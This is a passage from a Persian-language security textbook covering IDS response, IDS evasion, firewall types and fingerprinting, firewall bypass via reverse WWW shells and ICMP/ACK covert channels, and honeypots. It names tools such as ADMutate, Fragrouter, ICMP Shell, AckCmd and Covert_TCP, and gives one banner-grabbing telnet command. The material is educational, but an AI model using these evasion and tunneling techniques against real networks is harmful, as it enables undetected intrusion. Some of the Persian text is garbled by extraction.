آدرس، ﻏﻴﺮﻫﻤﺰﻣﺎن ﺳﺎزي و ﮔﺮﻓﺘﻦ ﻧﺸ ﺴﺖ ﻛﻼﻳﻨﺖ ﺟﺎري . .

اﻗﺪاﻣﺎﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﭘﺲ از ﺷﻨﺎﺳﺎﻳﻲ ﺣﻤﻠﻪ ﺗﻮﺳﻂ IDS ، اﻧﺠﺎم داد : :

• ﻓﺎﻳﺮوال را ﭘﻴﻜﺮﺑﻨﺪي ﻛﻨﻴﺪ ﺗﺎ آدرس IP ﻫﻜﺮ را ﻓﻴﻠﺘﺮ ﻛﻨﺪ • ﺑﻪ ﻣﺪﻳﺮ ﺷﺒﻜﻪ اﻃﻼع دﻫﻴﺪ ( از ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﻳﺎ اﻳﻤﻴﻞ)

214

• در event.log ، ﻳﻚ وروردي ﺟﺪﻳﺪ ﺑﻨﻮﻳﺴﻴﺪ . ﻳﻚ دﻳﺘﺎﮔﺮام SNMP ﺑﻪ ﻛﻨﺴﻮل ﻣﺪﻳﺮﻳﺘﻲ ﻫﻤﭽﻮن Tivoli ارﺳﺎل ﻛﻨﻴﺪ • اﻃﻼﻋﺎت ﺣﻤﻠﻪ را ذﺧﻴﺮه ﻛﻨﻴﺪ ( زﻣﺎن، IP ﻫﻜﺮ، IP و ﭘﻮرت ﻗﺮﺑﺎﻧﻲ، اﻃﻼﻋﺎت ﭘﺮوﺗﻜﻞ) • ﺑﺴﺘﻪ ﻫﺎي ﺧﺎم را در ﻳﻚ ﻓﺎﻳﻞ ردﮔﻴﺮي ﺑﺮاي ﺗﺤﻠﻴﻞ ﻫﺎي آﻳﻨﺪه ذﺧﻴﺮه ﻛﻨﻴﺪ • ﻧﺸﺴﺖ TCP را ﺧﺎﺗﻤﻪ دﻫﻴﺪ ﺑﺮاي اﻳﻨﻜﺎر ﻣ ﻲ ﺪﻴﻧاﻮﺗ از ﺑﺴﺘﻪ TCP FIN ﻳﺎ TCP RST ﺑﺮاي ﺧﺎﺗﻤﻪ ارﺗﺒﺎط اﺳﺘﻔﺎده ﻛﻨﻴﺪ

ﮔﺮﻳﺰ از IDS

ﺳﻴﺴﺘﻢ ﻫﺎي ﺗﺸﺨﻴﺺ ﻧﻔﻮذ در ﺑﺴﻴﺎري از ﺷﺒﻜﻪ ﻫﺎي ﺳﺎده، ﺑﺮ ﻣﺒﻨﺎي ﻣﻘﺎﻳﺴﻪ اﻟﮕﻮ ( patern matching رﺎﻛ) رﺎﻛ) ﻣ ﻲ ﺪﻨﻨﻛ . اﺳﻜﺮﻳﭙﺖ ﻫﺎي ﺣﻤﻠﻪ، اﻟﮕﻮﻫﺎي ﺷﻨﺎﺧﺘﻪ ﺷﺪه اي دارﻧﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﺑﺎ اﻳﺠﺎد ﭘﺎﻳﮕﺎه داده اي از اﻳﻦ اﺳﻜﺮﻳﭙﺖ ﻫﺎ، ﺑﻪ راﺣﺘﻲ ﻣﻲ ﺗﻮان ﺣﻤﻼت را ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮد اﻣﺎ ﺑﺎ ﺗﻐﻴﻴﺮ اﺳﻜﺮﻳﭙﺖ، ﻣﻲ ﺗﻮان IDS را دور زد . .

اﺑﺰارﻫﺎي ﻫﻚ ADMutate ، ﻳﻚ اﺳﻜﺮﻳﭙﺖ ﺣﻤﻠﻪ اﺳﺖ و اﺳﻜﺮﻳﭙﺖ دﻳﮕﺮي ﻛﻪ ﺑﺮاي اﻧﺠﺎم ﺣﻤﻠﻪ، ﻋﻤﻠﻴﺎﺗﻲ اﺳﺖ را اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ . اﺳﻜﺮﻳﭙﺖ ﺟﺪﻳﺪ، در ﭘﺎﻳﮕﺎه داده signature ﻫﺎي ﺷﻨﺎﺧﺘﻪ ﺷﺪه ﻧﻴﺴﺖ و ﺑﻨﺎﺑﺮاﻳﻦ، ﻣﻲ ﺗﻮاﻧﺪ IDS را دور ﺑﺰﻧﺪ.

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : Fragrouter ، Stick ، Mendax ، SideStep و Anzen NIDSbench . .

ﻓﺎﻳﺮوال

ﻓﺎﻳﺮوال، ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻧﺮم اﻓﺰاري ﻳﺎ ﺳﺨﺖ اﻓﺰاري اﺳﺖ ﻛﻪ اﺟﺎزه ﻳﺎ ﻋﺪم اﺟﺎزه دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ را ﻣﻲ دﻫﺪ و از ﻗﻮاﻧﻴﻨﻲ ﻛﻪ ﻣﺪﻳﺮ ﻣﺸﺨﺺ ﻛﺮده اﺳﺖ، ﺗﺒﻌﻴﺖ ﻣﻲ ﻛﻨﺪ ﺗﺎ اﺟﺎزه ﻋﺒﻮر ﺑﺴﺘﻪ ﻫﺎ ار ﺑﻪ ﺷﺒﻜﻪ ﺑﺪﻫﺪ . ﻓﺎﻳﺮوال ﺳﺨﺖ اﻓﺰاري ﻣﺤﻴﻂ ( perimeter) ، در ﻟﺒﻪ ﺷﺒﻜﻪ ﻛﻪ ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺑﻪ اﻳﻨﺘﺮﻧﺖ ( ﻳﺎ ﺷﺒﻜﻪ دﻳﮕﺮ ) ﻣﺘﺼﻞ اﺳﺖ، ﻗﺮار ﻣﻲ ﮔﻴﺮد . ﻓﺎﻳﺮوال ﻧﺮم اﻓﺰاري، از ﻛﺎﻣﭙﻴﻮﺗﺮ ﺷﺨﺼﻲ ﻣﺤﺎﻓﻈﺖ ﻣﻲ ﻛﻨﺪ . .

215

ﻛﺎرﻫﺎﻳﻲ ﻛﻪ ﻓﺎﻳﺮوال اﻧﺠﺎم ﻣﻲ دﻫﺪ : :

• ﻓﺎﻳﺮوال، ﺗﻤﺎم ﺗﺮاﻓﻴﻚ ﺑﻴﻦ دو ﺷﺒﻜﻪ را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ ﻛﻪ آﻳﺎ ﺗﺮاﻓﻴﻜﻲ ﺑﺎ ﻳﻜﻲ از rule ﻫﺎ ﺳﺎزﮔﺎر اﺳﺖ ﻳﺎ ﻧﻪ • ﺑﺴﺘﻪ ﻫﺎ را ﺑﻴﻦ ﺷﺒﻜﻪ ﻫﺎ ﻣﺴﻴﺮدﻫﻲ ﻣﻲ ﻛﻨﺪ • دﺳﺘﺮﺳﻲ ﻋﻤﻮﻣﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺷﺒﻜﻪ ﺧﺼﻮﺻﻲ را ﻣﺪﻳﺮﻳﺖ ﻣﻲ ﻛﻨﺪ • ﺗﻤﺎم ﺗﻼش ﻫﺎ ﺑﺮاي ورود ﺑﻪ ﺷﺒﻜﻪ ﺧﺼﻮﺻﻲ را ﺛﺒﺖ ﻣﻲ ﻛﻨﺪ و زﻣﺎﻧﻴﻜﻪ ﻛﺴﻲ ﻗﺼﺪ دﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎز را داﺷﺘﻪ ﺑﺎﺷﺪ، ﻫﺸ راﺪ ﻣﻲ دﻫﺪ . .

اﻧﻮاع ﻓﺎﻳﺮوال

ﻓﺎﻳﺮوال ﻫﺎ ﺑﻪ ﭼﻬﺎر دﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻣﻲ ﺷﻮﻧﺪ : :

• Packet filters: در ﻻﻳﻪ network از ﻣﺪل OSI ﻛﺎر ﻣﻲ ﻛﻨﺪ و ﻣﻌﻤﻮﻻ ﺑﺨﺸﻲ از روﺗﺮ اﺳﺖ . در اﻳﻦ ﻧﻮع ﻓﺎﻳﺮوال، ﺑﺴﺘﻪ ﻫﺎ ﻗﺒﻞ از ارﺳﺎل، ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﺷﻮﻧﺪ . rule ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺷﺎﻣﻞ آدرس IP ﻣﺒﺪا و ﻣﻘﺼﺪ، ﺷﻤﺎره

216

ﭘﻮرت ﻣﺒﺪا و ﻣﻘﺼﺪ، و ﭘﺮوﺗﻜﻞ ﻣﻮرد اﺳﺘﻔﺎده ﺑﺎﺷﻨﺪ . ﻣﺰﻳﺖ اﻳﻦ ﻓﺎﻳﺮوال ﻫﺎ اﻳﻦ اﺳﺖ ﻛﻪ ﺗﺎﺛﻴ ﺮ زﻳﺎدي در performance ﺷﺒﻜﻪ ﻧﺪارﻧﺪ و ﻫﺰﻳﻨﻪ آﻧﻬﺎ ﭘﺎﻳﻴﻦ اﺳﺖ . اﻏﻠﺐ روﺗﺮﻫﺎ، packet filtering رو ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﻨﺪ.

• Circuit level gateways: در ﻻﻳﻪ session از ﻣﺪل OSI ﻛﺎر ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻓﺎﻳﺮوال ﻫﺎ، TCP handshaking را ﺑﻴﻦ ﺑﺴﺘﻪ ﻫﺎ ﻣﺎﻧﻴﺘﻮر ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ ﻗﺎﻧﻮﻧﻲ ﺑ دﻮ ن ﻧﺸﺴﺖ را ﺗﻌﻴﻴﻦ ﻛﻨﺪ . ﺑﺴﺘﻪ ﻫﺎﻳﻲ ﻛﻪ از ﻃﺮﻳﻖ circuit-level gateway ﻫﺎ ﺑﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻣﻲ رﺳﻨﺪ اﻳﻨﮕﻮﻧﻪ ﺑﻪ ﻧﻈﺮ ﻣﻲ رﺳﻨﺪ ﻛﻪ از gateway ﺗﻮﻟﻴﺪ ﺷﺪه .اﻧﺪ اﻳﻦ ﻓﺎﻳﺮوال ﻫﺎ، ﻧﺴﺒﺘﺎ ارزان ﻫﺴﺘﻨﺪ . ﻫﻤﭽﻨﻴﻦ اﻳﻦ ﻧﻮع ﻓﺎﻳﺮوال ﻫﺎ، اﻃﻼﻋﺎت ﺷﺒﻜﻪ ﺧﺼﻮﺻﻲ را ﻣﺨﻔﻲ ﻣﻲ ﻛﻨﻨﺪ.

• Application level gateways: اﻳﻦ gateway ﻫﺎ ﺑﺎ ﻧﺎم ﭘﺮوﻛﺴﻲ ﻫﻢ ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮﻧﺪ ﻛﻪ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺴﺘﻪ ﻫﺎ را در ﻻﻳﻪ application ﻣﺪل OSI ﻓﻴﻠﺘﺮ ﻛﻨﻨﺪ . اﮔﺮ ﻳﻚ application-level gateway ، ﺑﻪ ﻋﻨﻮان web proxy ﭘﻴﻜﺮﺑ ﻨﺪي ﺷﻮد، اﺟﺎزه ﻋﺒﻮر ﺗﺮاﻓﻴﻚ telnet ، gopher ، FTP و ... را ﻧﻤﻲ دﻫﺪ و از آﻧﺠﺎﺋﻴﻜﻪ در ﻻﻳﻪ application ﻛﺎر ﻣﻲ ﻛﻨﺪ، ﻣﻲ ﺗﻮاﻧﺪ دﺳﺘﻮرات ﺧﺎﺻﻲ از ﻗﺒﻴﻞ http:post و get را ﻓﻴﻠﺘﺮ ﻛﻨﺪ.

• Stateful multilayer inspection firewalls: اﻳﻦ ﻧﻮع ﻓﺎﻳﺮوال ﻫﺎ، ﺟﻨﺒﻪ ﻫﺎي ﺳﻪ ﻧﻮع ﻓﺎﻳﺮوال را ادﻏﺎم ﻣﻲ ﻛﻨﻨﺪ . اﻳﻦ ﻧﻮع ﻓﺎﻳﺮوال ﻫﺎ، ﺑﺴﺘﻪ ﻫﺎ را در ﻻﻳﻪ network از ﻣﺪل OSI ﻓﻴﻠﺘﺮ ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ ﻗﺎﻧﻮﻧﻲ ﺑﻮدن ﻧﺸﺴﺘﻲ را ﺗﻌﻴﻦ ﻛﻨﻨﺪ و ﻣﺤﺘﻮاي ﺑﺴﺘﻪ ﻫﺎ را در ﻻﻳﻪ application ارزﻳﺎﺑﻲ ﻣﻲ ﻛﻨﻨﺪ . اﻳﻦ ﻧﻮع ﻓﺎﻳﺮوال ﻫﺎ، ﮔﺮان ﻫﺴﺘﻨﺪ و ﻧﻴﺎز ﺑﻪ داﻧﺶ ﻛﺎﻓﻲ ﺑﺮاي ﻣﺪﻳﺮﻳﺖ دﺳﺘﮕﺎه دارﻧﺪ . .

ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻓﺎﻳﺮوال ( ﻧﻮع، ﻧﺴﺨﻪ، و ﻗﻮاﻧﻴﻦ ) ﻣﻲ ﺗﻮان از ﺗﻜﻨﻴﻚ ﻫﺎي Firewalking ، Port Scanning ، و Banner Grabbing اﺳﺘﻔﺎده ﻛﺮد . Firewalking ، روﺷﻲ ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎ ت از ﺷﺒﻜﻪ اي ﻛﻪ ﭘﺸﺖ ﻓﺎﻳﺮوال اﺳﺖ، ﻣﻲ ﺑﺎﺷﺪ ، ﺳا ﺖ . ﻫﻤﭽﻨﻴﻦ Banner Grabbing ، ﭘﻴﺎم ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻫﻨﮕﺎم اﺗﺼﺎل ﺑﻪ ﺳﺮوﻳﺲ، ﺗﻮﺳﻂ ﺳﺮوﻳﺲ ﻫﺎي ﺷﺒﻜﻪ اي ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ و ﺳﺮوﻳﺲ در ﺣﺎل اﺟﺮا روي ﺳﻴﺴﺘﻢ را اﻋﻼم ﻣﻲ ﻛﻨﻨﺪ . اﻳﻦ ﻳﻚ روش ﺳﺎده ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ اﺳﺖ ﻫﻤﭽﻨﻴﻦ در ﺷﻨﺎﺳﺎﻳﻲ ﺳﺮوﻳﺲ ﻫﺎي در ﺣﺎل اﺟﺮا در ﭘﺸﺖ ﻓﺎﻳﺮوال ﻛﻤﻚ ﻣﻲ ﻛﻨﺪ . ﺳﻪ ﺳﺮوﻳﺲ اﺻﻠﻲ ﻛﻪ ﺑﻨﺮﻫﺎ را ارﺳﺎل ﻣﻲ ﻛﻨﻨﺪ، ﺳﺮورﻫﺎي Telnet ، FTP و Web ﻫﺴﺘﻨﺪ . ﺑﺮاي ﻣﺜﺎل telnet mail.targetcompany.org 25 ، ﻳﻚ SMTP banner grabbing اﺳﺖ . .

ﻳﻜﻲ از ﺳﺎده ﺗﺮﻳﻦ روش ﻫﺎ ﺑﺮاي ﻧﻔﻮذ ﺑﻪ ﻓﺎﻳﺮوال، ﻧﺼﺐ ﻧﺮم اﻓﺰار ﺷﺒﻜﻪ اي ﺑﺮ روي ﺳﻴﺴﺘﻢ داﺧﻠﻲ اﺳﺖ ﻛﻪ ﺑﺎ اﺳﺘﻔﺎده از ﭘﻮرﺗﻲ ﻛﻪ اﺟﺎزه ﻋﺒﻮر از ﻓﺎﻳﺮوال را دارد، ارﺗﺒﺎط ﺑﺮﻗﺮار ﻣﻲ ﻛﻨﺪ . ﻣﻌﻤﻮﻻ ﭘﻮرت 80 ﺑﺮاي اﺳﺘﻔﺎده وب ﺳﺮورﻫﺎ در ﻓﺎﻳﺮوال ﻫﺎ ﺑﺎز اﺳﺖ . .

آﺳﺎن ﺗﺮﻳﻦ روش ﺑﺮاي دور زدن ﻓﺎﻳﺮوال، ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻢ از ﻃﺮف داﺧﻞ ﻳﺎ ﺨﺑ ﺶ ﻣﻮرد اﻋﺘﻤﺎد ﻓﺎﻳﺮوال اﺳﺖ . ﺳﭙﺲ ﺳﻴﺴﺘﻢ ﺑﻪ ﺧﻄﺮ اﻓﺘﺎده ﻣﻲ ﺗﻮاﻧﺪ از ﻃﺮﻳﻖ ﻓﺎﻳﺮوال، از ﺷﺒﻜﻪ داﺧﻠﻲ ﺑﻪ ﺷﺒﻜﻪ ﺑﻴﺮون و ﺳﻴﺴﺘﻢ ﻫﻜﺮ ﻣﺘﺼﻞ ﺷﻮد . راﻳﺞ ﺗﺮﻳﻦ روش ﺑﺮاي اﻳﻨﻜﺎر، اﺗﺼﺎل ﺳﻴﺴﺘﻢ ﺑﻪ ﺧﻄﺮ اﻓﺘﺎده ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﻜﺮ از ﻃﺮﻳﻖ ﭘﻮرت 80 اﺳﺖ ﻛﻪ ﻣﺸﺎﺑﻪ اﺗﺼﺎل ﻳﻚ ﻛﻼﻳﻨﺖ ﺑﻪ ﻳﻚ وب ﺳﺮور از ﻃﺮﻳﻖ ﻓﺎﻳﺮوال اﺳﺖ . اﻳﻦ روش ﺑﺎ ﻧﺎم reverse WWW shell ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . .

217

اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ ﺟ اﻮ ب ﻣﻲ ﻫد ﺪ ﺑﺮاي اﻳﻨﻜﻪ اﻏﻠﺐ ﻓﺎﻳﺮوال ﻫﺎ، اﺟﺎزه اﺗﺼﺎﻻت ﺧﺮوﺟﻲ ﻛﻪ ﺑﻪ ﭘﻮرت 80 ﻣﻲ ﺷﻮد، را ﻣﻲ دﻫﻨﺪ

ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺎ اﺳﺘﻔﺎده از ﺗﺎﻧﻞ ﺑﺮاي ارﺳﺎل ﺗﺮاﻓﻴﻚ HTTP، ﻓﺎﻳﺮوال را دور ﺑﺰﻧﺪ و ﺣﻤﻠﻪ را ﺑﻪ ﻋﻨﻮان ﺗﺮاﻓﻴﻚ ﺑﻲ ﺧﻄﺮ ﺑﻪ ﻓﺎﻳﺮوال ﻧﺸﺎن دﻫﺪ اﻳﻦ ﺣﻤﻼت ﺑﺮاي ﻣﺪﻳﺮان ﺳﻴﺴﺘﻢ، ﻏﻴﺮ ﻗﺎﺑﻞ ردﮔﻴﺮي ﻫﺴﺘﻨﺪ . ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻫﻚ ﻣﻲ ﺗﻮاﻧﻨﺪ ﻛﺎﻧﺎل ﻫﺎي covert اﻳﺠﺎد ﻛﻨﻨﺪ و ﺗﺮاﻓﻴﻚ ﺣﻤﻠﻪ را از ﻃﺮﻳ ﻖ ﻳﻚ ﻣﺴﻴﺮ ﻣﺠﺎز ﻣﺜﻞ درﺧﻮاﺳﺖ ﻫﺎ و ﭘﺎﺳﺦ ﻫﺎي ICMP ، اﻧﺘﻘﺎل دﻫﻨﺪ . روش دﻳﮕﺮ ﺑﺮاي اﺳﺘﻔﺎده از ﻛﺎﻧﺎل covert ، ﺗﺎﻧﻞ زدن ﺗﺮاﻓﻴﻚ ﺣﻤﻠﻪ ﺑﻪ ﻋﻨﻮان ﻳﻚ ﺑﺎزﺧﻮرد TCP ( acknowledgment ) اﺳﺖ . .

اﺑﺰارﻫﺎي ﻫﻚ Shell 007 ، ﺑﺮﻧﺎﻣﻪ shell-tunneling اﺳﺖ ﻛﻪ ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﻛﻪ از ﻳﻚ ﻛﺎﻧﻞ covert ﺑﺮاي ﺣﻤﻠﻪ و دور زدن ﻗﻮاﻧﻴﻦ ﻓﺎﻳﺮوال اﺳﺘﻔﺎده ﻛﻨﺪ . .

ICMP Shell ، ﺑﺮﻧﺎﻣﻪ اي ﻣﺸﺎﺑﻪ Telnet اﺳﺖ ﻛﻪ ﻫﻜﺮ ﺑﺮاي اﻳﺠﺎد ارﺗﺒﺎط ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺎ اﺳﺘﻔﺎده از دﺳﺘﻮرات ICMP ( ﻛﻪ اﻏﻠﺐ ﻓﺎﻳﺮوال ﻫﺎ اﺟﺎزه ﻣﻲ دﻫﻨﺪ ) اﺳﺘﻔﺎده ﻣﻲ .ﺪﻨﻛ .ﺪﻨﻛ

AckCmd ، ﺑﺮﻧﺎﻣﻪ ﻛﻼﻳﻨﺖ / ﺳﺮوري اﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺑﺎ اﺳﺘﻔﺎده از ﺑﺴﺘﻪ ﻫﺎي TCP ACK ارﺗﺒﺎط ﺑﺮﻗﺮار ﻣﻲ ﻛﻨﺪ و ﻣﻲ ﺗﻮاﻧﺪ از ﻓﺎﻳﺮوال ﻋﺒﻮر ﻛﻨﺪ . .

Covert_TCP ، ﺑﺮﻧﺎﻣﻪ اي اﺳﺖ ﻛﻪ ﻫﻜﺮ ﺑﺮاي ارﺳﺎل ﻓﺎﻳﻞ از ﻃﺮﻳﻖ ﻓﺎﻳﺮوال اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﻛﻪ اﻳﻨﻜﺎر را ﺑﺎ ارﺳﺎل ﻳﻚ ﺑﺎﻳﺖ در ﻫﺮ ﻟﺤﻈﻪ و ﺑﺎ ﻣﺨﻔﻲ ﻛﺮدن داده در ﻫﺪر IP اﻧﺠﺎم ﻣﻲ دﻫﺪ . .

اﺑﺰارﻫﺎي ﺗﺴﺖ Traffic IQ Professional ، اﺑﺰاري ﺑﺮاي ﺗﺴﺖ ﺳﺮﻳﻊ و راﺣﺖ دﺳﺘﮕﺎه ﻫﺎي اﻣﻨﻴﺘﻲ اﺳﺖ ﻛﻪ ﺗﺮاﻓﻴﻚ اﺳﺘﺎﻧﺪارد ﻳﺎ ﺗﺮاﻓﻴﻚ ﺣﻤﻠﻪ، ﺑﻴﻦ دو ﻣﺎﺷﻴﻦ ﻣﺠﺎزي اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻧﺮم اﻓﺰار ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ارزﻳﺎﺑﻲ، ﺑﺮرﺳﻲ، و ﺗﺴﺖ وﻳﮋﮔﻲ ﻫﺎي رﻓﺘﺎري ﻫﺮ دﺳﺘﮕﺎه ﻓﻴﻠﺘﺮﻳﻨﮓ ﺑﺴﺘﻪ اﺳﺘﻔﺎده ﺷﻮد از ﻗﺒﻴﻞ : : • Application layer firewalls • Intrusion Detection Systems • Intrusion Prevention Systems • Routers and Switches

218

TCPOpera ، ﺑﺎ اﻳﺠﺎد ﺗﺮاﻓﻴﻚ، ﻣﺤﻴﻄﻲ ار ﺑﺮاي ﺗﺴﺖ رﻓﺘﺎر IDS ﻓﺮاﻫﻢ ﻣﻲ ﻛﻨﺪ . .

Firewall Informer ، ﭘﻴﻜﺮﺑﻨﺪي و ﻛﺎراﻳﻲ ﻫﺮ ﻧﻮع ﻓﺎﻳﺮوال ﻳﺎ دﺳﺘﮕﺎه ﻫﺎي دﻳﮕﺮ ﻓﻴﻠﺘﺮﻳﻨﮓ ﺑﺴﺘﻪ از ﻗﺒﻴﻞ روﺗﺮ و ﺳﻮﺋﻴﭻ را ارزﻳﺎﺑﻲ ﻣﻲ ﻛﻨﺪ . ﺑﺮﺧﻼف دﻳﺪﮔﺎه ﭘﺴﻴﻮ در ارزﻳﺎﺑﻲ آ ﻴﺳ ﺐ ﭘﺬﻳﺮي ﻣﺤﺼﻮﻻت، اﻳﻦ ﻧﺮم اﻓﺰار، از ﻧﺮم اﻓﺰار BLADE ﻛﻪ از ﺗﻜﻨﻮﻟﻮژي SAFE ( ﺣﻤﻠﻪ ﺷﺒﻴﻪ ﺳﺎزي ﺷﺪه ﺑﺮاي ﺣﻤﻠﻪ ) ﺑﻬﺮه ﻣﻲ ﮔﻴﺮد، ﺑ ﺮاي ﺗﺴﺖ اﻣﻨﻴﺖ زﻳﺮﺳﺎﺧﺖ در ﺑﺮاﺑﺮ ﺗﻬﺪﻳﺪات ﺟﻬﺎن واﻗﻌﻲ، اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . .

Atelier Web Firewall Tester ، اﺑﺰاري ﺑﺮاي ﺑﺮرﺳﻲ ﻗﺪرت ﻓﺎﻳﺮوال ﺷﺨﺼﻲ در ﺑﺮاﺑﺮ ﺗﻼش ﺑﺮاي ارﺗﺒﺎﻃﺎت ﺧﺮوﺟﻲ از ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻏﻴﺮﻣﺠﺎز اﺳﺖ . اﻳﻦ ﻧﺮم اﻓﺰار، 6 ﻧﻮع ﺗﺴﺖ دارد ﻛﻪ ﻫﺮ ﻛﺪام از آﻧﻬﺎ ﻳﻚ ارﺗﺒﺎط HTTP را ﺑﺮﻗﺮار ﻣﻲ ﻛﻨﻨﺪ و ﺳﻌﻲ ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ ﺻﻔﺤﻪ وب داﻧﻠﻮد ﻛﻨﻨﺪ . .

Honeypot honeypot ، داﻣﻲ اﺳﺖ ﻛﻪ در DMZ ﺷﺒﻜﻪ ﺷﻤﺎ ﻗﺮار ﻣﻲ ﮔﻴﺮد و ﺗﻮﺳﻂ ﻣﺘﺨﺼﺼﺎن اﻣﻨﻴﺘﻲ ﺑﺮاي ﺑﻪ دام اﻧﺪاﺧﺘﻦ ﻫﻜﺮﻫﺎ ﻳﺎ ﺑﺮاي دور ﻧﮕﻪ داﺷﺘﻦ آﻧﻬﺎ از ﺳﻴﺴﺘﻢ ﻫﺪف اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . Honeypot ، ﻳﻚ دام اﺳﺖ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ ﻫﻜﺮ ﺳﻌﻲ ﻛﻨﺪ ﻛﻪ ﺑﻪ آن ﺣﻤﻠﻪ ﻛﻨﺪ و ﻧﺮم اﻓﺰار ﺳﻴﺴﺘﻢ، ﻣﻲ ﺗﻮاﻧﺪ اﻃﻼﻋﺎت ﻣﺮﺑﻮط ﺑﻪ ﻫﻜﺮ از ﻗﺒﻴﻞ آدرس IP را ﺛﺒﺖ ﻛﻨﺪ . اﻳﻦ اﻃﻼﻋﺎت ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي دﺳﺘﮕﻴﺮي ﻫﻜﺮ ﭘﺲ از ﺣﻤﻠﻪ ﻛﻤﻚ ﻛﻨﺪ . ﺑﻬﺘﺮﻳﻦ ﻣﻜﺎن ﺑﺮاي ﻳﻚ honeypot ، ﺟﻠﻮي ﻓﺎﻳﺮوال روي DMZ اﺳﺖ ﻛﻪ آن را ﺑﺮاي ﻫﻜﺮﻫﺎ ﺑﺴﻴﺎر ﺟﺬاب ﻣﻲ ﻛﻨﺪ . ﻳﻚ honeypot ﺑﺎ ﻳﻚ آدرس اﺳﺘﺎﺗﻴﻚ، ﺷﺒﻴﻪ ﻳﻚ ﺳﺮور واﻗﻌﻲ اﺳﺖ.

219

اﻧﻮاع ﻣﺨﺘﻠﻒ honeypot

• Honeypot ﺑﺎ ﺗﻌﺎﻣﻞ ﻛﻢ ( Low-interaction ): از ﻗﺒﻴﻞ Honeyd ، Specter ، و KFSensr. • Honeypot ﺑﺎ ﺗﻌﺎﻣﻞ ﻣﺘﻮﺳﻂ ( Medium-interaction) • Honeypot ﺑﺎ ﺗﻌﺎﻣﻞ زﻳﺎد ( High-interaction ): از ﻗﺒﻴﻞ Honeynets

ﻣﺰاﻳﺎي honeypot : :

• False positive را ﻛﺎﻫﺶ ﻣﻲ دﻫﺪ • ﺣﻤﻼت ﺟﺪﻳﺪ را ﻣﻲ ﮔﻴﺮد و false negative را ﻛﺎﻫﺶ ﻣﻲ دﻫﺪ • در ﻣﺤﻴﻂ ﻫﺎي رﻣﺰ ﺷﺪه ﻳﺎ IPv6 ﻛﺎر ﻣﻲ ﻛﻨﺪ • ﻣﻔﻬﻮم ﺳﺎده اي اﺳﺖ ﻛﻪ ﺑﻪ ﻣﻨﺎﺑﻊ ﻛﻤﻲ ﻧﻴﺎز دارد

ﻴﻋ ﺐ honypot ﻦﻳا ﺳا ﺖ ﻪﻛ ياراد رﻳﺴﻚ ﻲﻳﻻﺎﺑ ﺳا ﺖ ( ﻣﺨﺼﻮﺻﺎ در ﻧﻮع high-interaction ) )

ﻣﺤﻞ ﻗﺮار ﮔﻴﺮي honeypot در ﺷﺒﻜﻪ

Honeypot ﺑﺎﻳﺪ در ﺟﻠﻮي ﻓﺎﻳﺮوال روي DMZ ﻗﺮار ﮔﻴﺮد . ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺧﺎﻃﺮ داﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻧﺒﺎﻳﺪ ﺑﺮاي ﻣﺪت ﻃﻮﻻﻧﻲ در ﻳﻚ ﺟﺎي ﺛﺎﺑﺖ ﻗﺮار ﮔﻴﺮد . ﺷﻜﻞ زﻳﺮ ﻧﻤﺎﻳﻲ از ﻣﺤﻞ ﻗﺮار ﮔﻴﺮي honeypot را در ﺷﺒﻜﻪ ﻧﺸﺎن ﻣﻲ دﻫﺪ

220

